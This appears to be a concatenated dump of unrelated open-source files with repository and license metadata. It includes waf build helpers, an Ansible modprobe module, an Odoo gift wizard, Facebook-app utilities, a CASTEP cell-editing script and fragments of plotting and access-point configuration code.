textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.197),
fontsize=4.5,color='w',alpha=0.6)
t3 = plt.annotate(r'\textbf{DATA}: NOAA ERSSTv5, Huang et al. (2017)',
textcoords='axes fraction',
xy=(0,0), xytext=(0.02,-0.227),
fontsize=4.5,color='w',alpha=0.6)
t4 = plt.annotate(r'\textbf{SEA SURFACE TEMPERATURES}',
textcoords='axes fraction',
xy=(0,0), xytext=(0.24,-0.036),fontsize=13,color='w',alpha=0.6)
m.fillcontinents(color='k')
cbar = plt.colorbar(cs,drawedges=False,orientation='horizontal',
pad = 0.04,fraction=0.035)
cbar.set_ticks(barlim)
cbar.set_ticklabels(list(map(str,barlim)))
cbar.set_label(r'\textbf{$\bf{^\circ}$\textbf{C}}',fontsize=13,
color='w')
cbar.ax.tick_params(axis='x', size=.001)
cbar.ax.tick_params(labelsize=6)
plt.subplots_adjust(bottom=0.2)
### Save figure to create animation using ImageMagick
if i < 10:
plt.savefig(directoryfigure + 'sstq_00%s.png' % (i),
dpi=200)
elif i < 100:
plt.savefig(directoryfigure + 'sstq_0%s.png' % (i),
dpi=200)
else:
plt.savefig(directoryfigure + 'sstq_%s.png' % (i),
dpi=200)
### Remove text for each figure
t.remove()
t1.remove()
t2.remove()
t3.remove()
t4.remove() | mit |
Chiru/NVE_Simulation | NS3/waf-tools/misc.py | 69 | 11666 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
This tool is totally deprecated
Try using:
.pc.in files for .pc files
the feature intltool_in - see demos/intltool
make-like rules
"""
import shutil, re, os
from waflib import TaskGen, Node, Task, Utils, Build, Errors
from waflib.TaskGen import feature, after_method, before_method
from waflib.Logs import debug
def copy_attrs(orig, dest, names, only_if_set=False):
"""
copy class attributes from an object to another
"""
for a in Utils.to_list(names):
u = getattr(orig, a, ())
if u or not only_if_set:
setattr(dest, a, u)
def copy_func(tsk):
"Make a file copy. This might be used to make other kinds of file processing (even calling a compiler is possible)"
env = tsk.env
infile = tsk.inputs[0].abspath()
outfile = tsk.outputs[0].abspath()
try:
shutil.copy2(infile, outfile)
except (OSError, IOError):
return 1
else:
if tsk.chmod: os.chmod(outfile, tsk.chmod)
return 0
def action_process_file_func(tsk):
"Ask the function attached to the task to process it"
if not tsk.fun: raise Errors.WafError('task must have a function attached to it for copy_func to work!')
return tsk.fun(tsk)
@feature('cmd')
def apply_cmd(self):
"call a command everytime"
if not self.fun: raise Errors.WafError('cmdobj needs a function!')
tsk = Task.TaskBase()
tsk.fun = self.fun
tsk.env = self.env
self.tasks.append(tsk)
tsk.install_path = self.install_path
@feature('copy')
@before_method('process_source')
def apply_copy(self):
Utils.def_attrs(self, fun=copy_func)
self.default_install_path = 0
lst = self.to_list(self.source)
self.meths.remove('process_source')
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
target = self.target
if not target or len(lst)>1: target = node.name
# TODO the file path may be incorrect
newnode = self.path.find_or_declare(target)
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
def subst_func(tsk):
"Substitutes variables in a .in file"
	m4_re = re.compile(r'@(\w+)@', re.M)
code = tsk.inputs[0].read() #Utils.readf(infile)
# replace all % by %% to prevent errors by % signs in the input file while string formatting
code = code.replace('%', '%%')
s = m4_re.sub(r'%(\1)s', code)
env = tsk.env
di = getattr(tsk, 'dict', {}) or getattr(tsk.generator, 'dict', {})
if not di:
names = m4_re.findall(code)
for i in names:
di[i] = env.get_flat(i) or env.get_flat(i.upper())
tsk.outputs[0].write(s % di)
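# --- Hedged illustration of the substitution above (not part of waf): the
# regex rewrites @NAME@ markers into printf-style placeholders, which are
# then filled from the substitution dict.
def _subst_example():
	m4_re = re.compile(r'@(\w+)@', re.M)
	template = '@PREFIX@/bin'.replace('%', '%%')  # mirror the %% escaping
	return m4_re.sub(r'%(\1)s', template) % {'PREFIX': '/usr'}  # '/usr/bin'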
@feature('subst')
@before_method('process_source')
def apply_subst(self):
Utils.def_attrs(self, fun=subst_func)
lst = self.to_list(self.source)
self.meths.remove('process_source')
self.dict = getattr(self, 'dict', {})
for filename in lst:
node = self.path.find_resource(filename)
if not node: raise Errors.WafError('cannot find input file %s for processing' % filename)
if self.target:
newnode = self.path.find_or_declare(self.target)
else:
newnode = node.change_ext('')
try:
self.dict = self.dict.get_merged_dict()
except AttributeError:
pass
if self.dict and not self.env['DICT_HASH']:
self.env = self.env.derive()
keys = list(self.dict.keys())
keys.sort()
lst = [self.dict[x] for x in keys]
self.env['DICT_HASH'] = str(Utils.h_list(lst))
tsk = self.create_task('copy', node, newnode)
tsk.fun = self.fun
tsk.dict = self.dict
tsk.dep_vars = ['DICT_HASH']
tsk.chmod = getattr(self, 'chmod', Utils.O644)
if not tsk.env:
tsk.debug()
raise Errors.WafError('task without an environment')
####################
## command-output ####
####################
class cmd_arg(object):
"""command-output arguments for representing files or folders"""
def __init__(self, name, template='%s'):
self.name = name
self.template = template
self.node = None
class input_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_resource(self.name)
if self.node is None:
raise Errors.WafError("Input file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.srcpath()
class output_file(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_or_declare(self.name)
if self.node is None:
raise Errors.WafError("Output file %s not found in " % (self.name, base_path))
def get_path(self, env, absolute):
if absolute:
return self.template % self.node.abspath()
else:
return self.template % self.node.bldpath()
class cmd_dir_arg(cmd_arg):
def find_node(self, base_path):
assert isinstance(base_path, Node.Node)
self.node = base_path.find_dir(self.name)
if self.node is None:
raise Errors.WafError("Directory %s not found in " % (self.name, base_path))
class input_dir(cmd_dir_arg):
def get_path(self, dummy_env, dummy_absolute):
return self.template % self.node.abspath()
class output_dir(cmd_dir_arg):
def get_path(self, env, dummy_absolute):
return self.template % self.node.abspath()
class command_output(Task.Task):
color = "BLUE"
def __init__(self, env, command, command_node, command_args, stdin, stdout, cwd, os_env, stderr):
Task.Task.__init__(self, env=env)
assert isinstance(command, (str, Node.Node))
self.command = command
self.command_args = command_args
self.stdin = stdin
self.stdout = stdout
self.cwd = cwd
self.os_env = os_env
self.stderr = stderr
if command_node is not None: self.dep_nodes = [command_node]
		self.dep_vars = [] # additional environment variables to look at
def run(self):
task = self
#assert len(task.inputs) > 0
def input_path(node, template):
if task.cwd is None:
return template % node.bldpath()
else:
return template % node.abspath()
def output_path(node, template):
fun = node.abspath
if task.cwd is None: fun = node.bldpath
return template % fun()
if isinstance(task.command, Node.Node):
argv = [input_path(task.command, '%s')]
else:
argv = [task.command]
for arg in task.command_args:
if isinstance(arg, str):
argv.append(arg)
else:
assert isinstance(arg, cmd_arg)
argv.append(arg.get_path(task.env, (task.cwd is not None)))
if task.stdin:
stdin = open(input_path(task.stdin, '%s'))
else:
stdin = None
if task.stdout:
stdout = open(output_path(task.stdout, '%s'), "w")
else:
stdout = None
if task.stderr:
stderr = open(output_path(task.stderr, '%s'), "w")
else:
stderr = None
if task.cwd is None:
cwd = ('None (actually %r)' % os.getcwd())
else:
cwd = repr(task.cwd)
debug("command-output: cwd=%s, stdin=%r, stdout=%r, argv=%r" %
(cwd, stdin, stdout, argv))
if task.os_env is None:
os_env = os.environ
else:
os_env = task.os_env
command = Utils.subprocess.Popen(argv, stdin=stdin, stdout=stdout, stderr=stderr, cwd=task.cwd, env=os_env)
return command.wait()
@feature('command-output')
def init_cmd_output(self):
Utils.def_attrs(self,
stdin = None,
stdout = None,
stderr = None,
# the command to execute
command = None,
# whether it is an external command; otherwise it is assumed
# to be an executable binary or script that lives in the
# source or build tree.
command_is_external = False,
# extra parameters (argv) to pass to the command (excluding
# the command itself)
argv = [],
# dependencies to other objects -> this is probably not what you want (ita)
# values must be 'task_gen' instances (not names!)
dependencies = [],
# dependencies on env variable contents
dep_vars = [],
# input files that are implicit, i.e. they are not
# stdin, nor are they mentioned explicitly in argv
hidden_inputs = [],
# output files that are implicit, i.e. they are not
# stdout, nor are they mentioned explicitly in argv
hidden_outputs = [],
# change the subprocess to this cwd (must use obj.input_dir() or output_dir() here)
cwd = None,
# OS environment variables to pass to the subprocess
# if None, use the default environment variables unchanged
os_env = None)
@feature('command-output')
@after_method('init_cmd_output')
def apply_cmd_output(self):
if self.command is None:
raise Errors.WafError("command-output missing command")
if self.command_is_external:
cmd = self.command
cmd_node = None
else:
cmd_node = self.path.find_resource(self.command)
assert cmd_node is not None, ('''Could not find command '%s' in source tree.
Hint: if this is an external command,
use command_is_external=True''') % (self.command,)
cmd = cmd_node
if self.cwd is None:
cwd = None
args = []
inputs = []
outputs = []
for arg in self.argv:
if isinstance(arg, cmd_arg):
arg.find_node(self.path)
if isinstance(arg, input_file):
inputs.append(arg.node)
if isinstance(arg, output_file):
outputs.append(arg.node)
if self.stdout is None:
stdout = None
else:
assert isinstance(self.stdout, str)
stdout = self.path.find_or_declare(self.stdout)
if stdout is None:
raise Errors.WafError("File %s not found" % (self.stdout,))
outputs.append(stdout)
if self.stderr is None:
stderr = None
else:
assert isinstance(self.stderr, str)
stderr = self.path.find_or_declare(self.stderr)
if stderr is None:
raise Errors.WafError("File %s not found" % (self.stderr,))
outputs.append(stderr)
if self.stdin is None:
stdin = None
else:
assert isinstance(self.stdin, str)
stdin = self.path.find_resource(self.stdin)
if stdin is None:
raise Errors.WafError("File %s not found" % (self.stdin,))
inputs.append(stdin)
for hidden_input in self.to_list(self.hidden_inputs):
node = self.path.find_resource(hidden_input)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_input, self.path))
inputs.append(node)
for hidden_output in self.to_list(self.hidden_outputs):
node = self.path.find_or_declare(hidden_output)
if node is None:
raise Errors.WafError("File %s not found in dir %s" % (hidden_output, self.path))
outputs.append(node)
if not (inputs or getattr(self, 'no_inputs', None)):
raise Errors.WafError('command-output objects must have at least one input file or give self.no_inputs')
if not (outputs or getattr(self, 'no_outputs', None)):
raise Errors.WafError('command-output objects must have at least one output file or give self.no_outputs')
cwd = self.bld.variant_dir
task = command_output(self.env, cmd, cmd_node, self.argv, stdin, stdout, cwd, self.os_env, stderr)
task.generator = self
copy_attrs(self, task, 'before after ext_in ext_out', only_if_set=True)
self.tasks.append(task)
task.inputs = inputs
task.outputs = outputs
task.dep_vars = self.to_list(self.dep_vars)
for dep in self.dependencies:
assert dep is not self
dep.post()
for dep_task in dep.tasks:
task.set_run_after(dep_task)
if not task.inputs:
# the case for svnversion, always run, and update the output nodes
task.runnable_status = type(Task.TaskBase.run)(runnable_status, task, task.__class__) # always run
task.post_run = type(Task.TaskBase.run)(post_run, task, task.__class__)
# TODO the case with no outputs?
def post_run(self):
for x in self.outputs:
x.sig = Utils.h_file(x.abspath())
def runnable_status(self):
return self.RUN_ME
Task.task_factory('copy', vars=[], func=action_process_file_func)
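# --- Hedged wscript sketch for the 'command-output' feature above
# (illustration only; the tool and file names are placeholders):
#
#   bld(features='command-output',
#       command='my_tool', command_is_external=True,
#       argv=[input_file('in.txt'), output_file('out.txt')],
#       stdout='tool.log')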
| bsd-3-clause |
CompassionCH/compassion-modules | gift_compassion/wizards/collect_gifts_wizard.py | 4 | 1439 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# Releasing children from poverty in Jesus' name
# @author: Emanuel Cino <[email protected]>
#
# The licence is in the file __manifest__.py
#
##############################################################################
from odoo import api, fields, models
from odoo.tools import safe_eval
class CollectGiftWizard(models.TransientModel):
""" This wizard generates a Gift Invoice for a given contract. """
_name = 'gift.collect.wizard'
invoice_line_ids = fields.Many2many(
'account.invoice.line', string='Invoice lines',
)
domain = fields.Char(
default="[('product_id.name', '=', 'Child gift'),"
" ('state', '=', 'paid'),"
" ('gift_id', '=', False)]"
)
@api.onchange('domain')
def apply_domain(self):
return {
'domain': {'invoice_line_ids': safe_eval(self.domain)}
}
@api.multi
def collect_invoices(self):
        # Read data in English
self.ensure_one()
gift = self.env['sponsorship.gift'].browse(
self.env.context['active_id'])
self.invoice_line_ids.write({'gift_id': gift.id})
return gift.write({
'invoice_line_ids': [(4, id) for id in self.invoice_line_ids.ids]
})
| agpl-3.0 |
CydarLtd/ansible | lib/ansible/modules/system/modprobe.py | 69 | 3813 | #!/usr/bin/python
#coding: utf-8 -*-
# (c) 2013, David Stygstra <[email protected]>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: modprobe
short_description: Add or remove kernel modules
requirements: []
version_added: 1.4
author:
- "David Stygstra (@stygstra)"
- "Julien Dauphant"
- "Matt Jeffery"
description:
- Add or remove kernel modules.
options:
name:
required: true
description:
- Name of kernel module to manage.
state:
required: false
default: "present"
choices: [ present, absent ]
description:
- Whether the module should be present or absent.
params:
required: false
default: ""
version_added: "1.6"
description:
- Modules parameters.
'''
EXAMPLES = '''
# Add the 802.1q module
- modprobe:
name: 8021q
state: present
# Add the dummy module
- modprobe:
name: dummy
state: present
params: 'numdummies=2'
'''
from ansible.module_utils.basic import *
from ansible.module_utils.pycompat24 import get_exception
import shlex
def main():
module = AnsibleModule(
argument_spec={
'name': {'required': True},
'state': {'default': 'present', 'choices': ['present', 'absent']},
'params': {'default': ''},
},
supports_check_mode=True,
)
args = {
'changed': False,
'failed': False,
'name': module.params['name'],
'state': module.params['state'],
'params': module.params['params'],
}
# Check if module is present
try:
modules = open('/proc/modules')
present = False
module_name = args['name'].replace('-', '_') + ' '
for line in modules:
if line.startswith(module_name):
present = True
break
modules.close()
except IOError:
e = get_exception()
module.fail_json(msg=str(e), **args)
# Check only; don't modify
if module.check_mode:
if args['state'] == 'present' and not present:
changed = True
elif args['state'] == 'absent' and present:
changed = True
else:
changed = False
module.exit_json(changed=changed)
# Add/remove module as needed
if args['state'] == 'present':
if not present:
command = [module.get_bin_path('modprobe', True), args['name']]
command.extend(shlex.split(args['params']))
rc, _, err = module.run_command(command)
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
elif args['state'] == 'absent':
if present:
rc, _, err = module.run_command([module.get_bin_path('modprobe', True), '-r', args['name']])
if rc != 0:
module.fail_json(msg=err, **args)
args['changed'] = True
module.exit_json(**args)
if __name__ == '__main__':
main()
| gpl-3.0 |
CyrilPeponnet/Archipel | ArchipelAgent/archipel-agent-action-scheduler/archipelagentactionscheduler/__init__.py | 5 | 2236 | # -*- coding: utf-8 -*-
#
# __init__.py
#
# Copyright (C) 2010 Antoine Mercadal <[email protected]>
# Copyright, 2011 - Franck Villaume <[email protected]>
# This file is part of ArchipelProject
# http://archipelproject.org
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import actionscheduler
def make_archipel_plugin(configuration, entity, group):
"""
This function is the plugin factory. It will be called by the object you want
    to be plugged in. It must return a list with at least one dictionary containing
    a key for the plugin information, and a key for the plugin object.
@type configuration: Config Object
@param configuration: the general configuration object
@type entity: L{TNArchipelEntity}
@param entity: the entity that has load the plugin
@type group: string
@param group: the entry point group name in which the plugin has been loaded
@rtype: array
@return: array of dictionary containing the plugins informations and objects
"""
return [{"info": actionscheduler.TNActionScheduler.plugin_info(),
"plugin": actionscheduler.TNActionScheduler(configuration, entity, group)}]
def version():
"""
    This function can be called by runarchipel -v in order to get the version of the
    installed plugin. You should only have to change the egg name.
@rtype: tupple
@return: tupple containing the package name and the version
"""
import pkg_resources
return (__name__, pkg_resources.get_distribution("archipel-agent-action-scheduler").version, [actionscheduler.TNActionScheduler.plugin_info()]) | agpl-3.0 |
yglazko/bedrock | bedrock/facebookapps/utils.py | 21 | 3549 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import urllib
from base64 import urlsafe_b64decode
from django.conf import settings
from django.utils.translation import get_language
import commonware.log
import tower
from lib import l10n_utils
log = commonware.log.getLogger('facebookapps.utils')
def unwrap_signed_request(request):
"""
Decodes and returns Facebook's `signed_request` data.
See https://developers.facebook.com/docs/howtos/login/signed-request/
"""
try:
encoded_signed_request = request.REQUEST['signed_request']
except KeyError:
return {}
encoded_string_data = encoded_signed_request.partition('.')[2]
# Pad with `=` to make string length a multiple of 4
# and thus prevent a base64 error
padding = ''.ljust(4 - len(encoded_string_data) % 4, '=')
padded_string = ''.join([encoded_string_data, padding])
# Convert to byte data for base64
encoded_byte_data = bytes(padded_string)
signed_request = json.loads(urlsafe_b64decode(encoded_byte_data))
# Change Facebook locale's underscore to hyphen
# ex. `en_US` to `en-US`
try:
locale = signed_request['user']['locale']
except KeyError:
locale = None
if locale:
signed_request['user']['locale'] = locale.replace('_', '-')
return signed_request
def app_data_query_string_encode(app_data):
return urllib.urlencode([('app_data[{key}]'.format(key=key), value)
for key, value in app_data.items()])
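# --- Hedged example (illustration only; 'ref'/'banner' are placeholder
# values). Facebook expects app_data keys in bracket notation, which
# urlencode percent-escapes.
def _app_data_example():
    return app_data_query_string_encode({'ref': 'banner'})
    # -> 'app_data%5Bref%5D=banner'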
def get_best_locale(locale):
"""
Returns the most appropriate locale from the list of supported locales.
This can either be the locale itself (if it's supported), the main locale
for that language if any or failing any of that the default `en-US`.
Adapted from `activate_locale` in Affiliates (http://bit.ly/17if6nh).
"""
# Compare using lowercase locales since they become lowercase once
# activated.
supported_locales = [loc.lower() for loc in settings.FACEBOOK_LOCALES]
# HACK: It's not totally clear to me where Django or tower do the matching
# that equates locales like es-LA to es, and I'm scared enough of getting
# it wrong to want to avoid it for the first release. So instead, we'll
# activate the requested locale, and then check what locale got chosen by
# django as the usable locale, and match that against our locale
# whitelist.
# TODO: Properly filter out locales prior to calling activate.
old_locale = get_language()
tower.activate(locale)
lang = get_language()
if lang.lower() not in supported_locales:
# Try to activate just the language and use the resulting locale
lang_prefix = lang.split('-')[0]
tower.activate(lang_prefix)
lang = get_language()
if lang.lower() not in supported_locales:
# Finally, try to find a locale with that language in the supported
# locales. Otherwise, use default en-US.
try:
lang = next(locale for locale in settings.FACEBOOK_LOCALES
if locale.startswith(lang_prefix))
except StopIteration:
lang = 'en-US'
tower.activate(old_locale)
return lang
def js_redirect(redirect_url, request):
return l10n_utils.render(request, 'facebookapps/js-redirect.html',
{'redirect_url': redirect_url})
| mpl-2.0 |
kaneod/physics | python/castep_special_atom.py | 2 | 11802 | #!/usr/bin/env python
################################################################################
#
# castep_special_atom.py
#
# Version 2.0
#
# Usage castep_special_atom.py SEED Z n
#
# Takes a .cell file SEED.cell, reads it in, changes the "nth" atom of type Z
# to Zspec, writes the file to SEED_special.cell with otherwise no changes.
#
# Designed for calculations where you have to repeat a calculation over all atoms
# of type Z with minor modifications to the pseudopotential for one special atom.
#
################################################################################
#
# Copyright 2013 Kane O'Donnell
#
# This library is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this library. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
#
# NOTES
#
# 1. WHY DID I NOT USE ESC_LIB? Because esc_lib.py has scipy dependencies that
# make it hard to get running on a cluster where the default python is from the
# dark ages and installing scipy is a pain anyway.
#
# 2. WHY DID I NOT JUST USE THE SAME DAMN ALGORITHMS AS ESC_LIB? Because it's
# a couple of years later and I have better ways of doing things now.
#
# 3. I did reuse SOME bits of esc_lib, ok? :o)
#
################################################################################
# This will fail on old python versions but is fine for 2.6 and 2.7
from __future__ import division
import argparse
# Debugging flag - set to 1 to see debug messages.
DEBUG=1
# SPECIAL text - what do you want added after the atomic Z to show it as special?
SPECIAL=":exc"
# Element dictionary - note that element 0 is given the UKN moniker.
elements = { 1 : "H", 2 : "He", 3 : "Li", 4 : "Be", 5 : "B", 6 : "C", 7 : "N", \
8 : "O", 9 : "F", 10 : "Ne", 11 : "Na", 12 : "Mg", 13 : "Al", 14 : "Si", \
15 : "P", 16 : "S", 17 : "Cl", 18 : "Ar", 19 : "K", 20 : "Ca", 21 : "Sc", \
22 : "Ti", 23 : "V", 24 : "Cr", 25 : "Mn", 26 : "Fe", 27 : "Co", 28 : "Ni", \
29 : "Cu", 30 : "Zn", 31 : "Ga", 32 : "Ge", 33 : "As", 34 : "Se", \
35 : "Br", 36 : "Kr", 37 : "Rb", 38 : "Sr", 39 : "Y", 40 : "Zr", 41 : "Nb", \
42 : "Mo", 43 : "Tc", 44 : "Ru", 45 : "Rh", 46 : "Pd", 47 : "Ag", \
48 : "Cd", 49 : "In", 50 : "Sn", 51 : "Sb", 52 : "Te", 53 : "I", 54 : "Xe", \
55 : "Cs", 56 : "Ba", 57 : "La", 58 : "Ce", 59 : "Pr", 60 : "Nd", \
61 : "Pm", 62 : "Sm", 63 : "Eu", 64 : "Gd", 65 : "Tb", 66 : "Dy", \
67 : "Ho", 68 : "Er", 69 : "Tm", 70 : "Yb", 71 : "Lu", \
72 : "Hf", 73 : "Ta", 74 : "W", 75 : "Re", 76 : "Os", 77 : "Ir", 78 : "Pt", \
79 : "Au", 80 : "Hg", 81 : "Tl", 82 : "Pb", 83 : "Bi", 84 : "Po", \
85 : "At", 86 : "Rn", 87 : "Fr", 88 : "Ra", 89 : "Ac", 90 : "Th", \
91 : "Pa", 92 : "U", 93 : "Np", 94 : "Pu", 95 : "Am", 96 : "Cm", 97 : "Bk", \
98 : "Cf", 99 : "Es", 100 : "Fm", 101 : "Md", 102 : "No", 103 : "Lr", \
104 : "Rf", 105 : "Db", 106 : "Sg", 107 : "Bh", 108 : "Hs", 109 : "Ds", \
110 : "Ds", 111 : "Rg", 112 : "Uub", 113 : "Uut", 114 : "Uuq", 115 : "Uup", \
116 : "Uuh", 117 : "Uus", 118 : "Uuo", 0 : "UKN"}
def getElementZ(elstr):
""" Z = getElementZ(elstr)
Given a string that contains either a Z number OR an element
abbreviation like Cu, MG, whatever, generates and returns the
appropriate integer Z.
"""
# Is it an integer?
try:
Z = int(elstr)
return Z
except ValueError:
# Not an integer.
if elstr.title() not in elements.values():
print "(libesc.getElementZ) Warning: Element %s is not in the elements dictionary. Returning 0 for element Z." % elstr
return 0
else:
for key, value in elements.items():
if elstr.title() == value:
return key
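# --- Hedged examples (illustration only): numeric strings and element
# abbreviations in any case resolve to the same Z.
def _get_element_z_examples():
  return getElementZ('29'), getElementZ('Cu'), getElementZ('cu')  # 29, 29, 29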
def remove_comments(lines, comment_delim="#",just_blanks=False):
""" stripped = remove_comments(lines, comment_delim="#", just_blanks=False)
Takes a sequence of lines (presumably from a data file)
and strips all comments, including ones at the end of
lines that are otherwise not comments. Note that we can
only deal with one kind of comment at a time - just apply
multiple times to strip multiple comment types.
Note that we also remove *blank* lines in here, just in
case we're going to do line-by-line processing subsequently
rather than join/splitting (eg. like for XSF files).
If just_blanks is specified, we only eliminate the blanks.
"""
stripped = []
for line in lines:
if just_blanks:
if line.strip() != "":
stripped.append(line.strip())
else:
if not (line.strip().startswith(comment_delim) or line.strip() == ""):
stripped.append(line.partition(comment_delim)[0].strip())
return stripped
def uniqify(sequence, trans=None):
""" unique = uniqify(sequence, trans)
Produces an order-preserved list of unique elements in the passed
sequence. Supports a transform function so that passed elements
can be transformed before comparison if necessary.
"""
if trans is None:
def trans(x): return x
seen = {}
unique = []
for item in sequence:
marker = trans(item)
if marker in seen: continue
seen[marker] = 1
unique.append(item)
return unique
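# --- Hedged example (illustration only): order is preserved, and trans
# controls what counts as a duplicate.
def _uniqify_examples():
  return (uniqify([3, 1, 3, 2, 1]),                   # [3, 1, 2]
          uniqify(['C', 'c', 'H'], trans=str.lower))  # ['C', 'H']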
def identify_block(line):
""" blockstr = identify_block(line)
Identifies the actual block title of a castep block like "%block positions_frac".
Can happily cope with comments after the block and all the usual perturbations
such as POSITIONS_FRAC, positionsFrac, positions frac, etc.
"""
# Our working string is wstr. First remove any comments
wstr = line.split("!")[0]
# Remove the actual block
wstr = wstr.split()[1:]
# Combine everything that remains, then split by _ and rejoin.
wstr = "".join(wstr)
wstr = wstr.split("_")
wstr = "".join(wstr)
# Convert to lowercase and return
return wstr.lower()
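# --- Hedged examples (illustration only): case, underscores and trailing
# comments are all normalised away.
def _identify_block_examples():
  return (identify_block('%block POSITIONS_FRAC ! atom positions'),
          identify_block('%BLOCK positionsFrac'))  # both 'positionsfrac'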
def parse_cell(lines):
""" positions, species, properties = parse_cell(lines)
Reads a .cell file and returns the positions, the species and a properties
dictionary that contains whether positions_frac or positions_abs was used,
the extra functional lines from the file and anything else useful.
Note we remove all comments.
"""
# Strip all the blank lines and comments.
lines = remove_comments(lines, "!")
# We don't use the for loop here because we may want to sub-loop over blocks.
i = 0
species = []
positions = []
extralines = []
properties = {}
while i < len(lines):
cline = lines[i]
if cline.split()[0].lower() == "%block":
btitle = identify_block(cline)
if DEBUG:
print "Found a block", btitle
if btitle == "positionsfrac" or btitle == "positionsabs":
if btitle == "positionsfrac":
properties["fractional"] = True
else:
properties["fractional"] = False
i += 1
cline = lines[i]
# Might be a units line
if len(cline.split()) == 1:
properties["has units"] = True
properties["units"] = cline.split()[0].strip()
i += 1
cline = lines[i]
else:
properties["has units"] = False
while cline.split()[0].lower() != "%endblock":
species.append(getElementZ(cline.split()[0]))
positions.append([float(x) for x in cline.split()[1:4]])
i += 1
cline = lines[i]
else:
# We aren't interested in the other blocks: just add them to the extra lines.
extralines.append(cline)
else:
# If we aren't reading a block and it isn't a line we're interested in, add
# to the extra lines.
extralines.append(cline)
i += 1
properties["extra lines"] = extralines
return positions, species, properties
def write_new_cell(seed, pos, spec, props, special_index):
""" write_new_cell(seed, pos, spec, props, special_index)
Writes the new .cell file to seed+"_special.cell" and with the special atom listed
as "Z:exc" or whatever the custom SPECIAL text is set at the top of the file.
"""
f = open(seed+"_special.cell", 'w')
# Write all the extra lines first
for line in props["extra lines"]:
f.write(line+"\n")
if "%endblock" in line.lower():
f.write("\n")
# Now write the positions block.
f.write("\n")
if props["fractional"] == True:
f.write("%block positions_frac\n")
else:
f.write("%block positions_abs\n")
if props["has units"]:
f.write(props["units"]+"\n")
for i in range(len(pos)):
if i == special_index:
pstr = "%s%s %g %g %g\n" % (elements[spec[i]], SPECIAL, pos[i][0], pos[i][1], pos[i][2])
else:
pstr = "%s %g %g %g\n" % (elements[spec[i]], pos[i][0], pos[i][1], pos[i][2])
f.write(pstr)
if props["fractional"] == True:
f.write("%endblock positions_frac\n")
else:
f.write("%endblock positions_abs\n")
f.close()
def index_of_species_index(species, Z, n):
""" i = index_of_species_index(Z, n)
Returns the absolute index in the species list of the nth species of element Z.
"""
si = -1
for i, s in enumerate(species):
if DEBUG:
print "Testing atom %d, element %d to see if it matches %d." % (i, s, n)
if s == Z:
si += 1
if si == n:
return i
# Didn't find it
return -1
# Main program
if __name__ == '__main__':
print "castep_special_atom version 2.0"
print ""
print "Written by Kane O'Donnell, September 2013"
print ""
# Parse the command line arguments
parser = argparse.ArgumentParser(description="Make a named atom special in a .cell file")
parser.add_argument('SEED', help="Input file is SEED.cell")
parser.add_argument('Z', help="Element (e.g. C or 6) to make special.")
parser.add_argument('n', type=int, help="Make the nth atom of element Z special. 1-based.")
args = parser.parse_args()
# Convert from 1-based n and possibly-string Z to 0-based n and integer Z.
n = args.n - 1
z = getElementZ(args.Z)
# Sanity check on inputs
if n < 0:
print "ERROR: It looks like you've specified a negative number for the atomic index. Try again. Exiting..."
exit(0)
if z == 0:
print "ERROR: You've specified an unknown element - it has to be one of the ones in our universe, not imaginary ones! Try again. Exiting..."
exit(0)
# Read the cell and check for any species "0" - i.e. if we already have special atoms.
f = open(args.SEED+".cell", 'r')
lines = f.readlines()
f.close()
p, s, props = parse_cell(lines)
if 0 in s:
print "ERROR: There are unknown species in this file already - you already have at least one special atom. For safety reasons, cannot continue. Goodbye!"
exit(0)
si = index_of_species_index(s, z, n)
if si == -1:
print "ERROR: Didn't find atom %d of species %s. Exiting..." % (n, args.Z)
exit(0)
write_new_cell(args.SEED, p, s, props, si)
print "Goodbye!"
exit(0) | gpl-3.0 |
ThirdProject/android_external_chromium_org | chrome/test/functional/ap_lab/dlink_ap_configurator.py | 76 | 12111 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import ap_configurator
import selenium.common.exceptions
class DLinkAPConfigurator(ap_configurator.APConfigurator):
"""Derived class to control the DLink DAP-1522."""
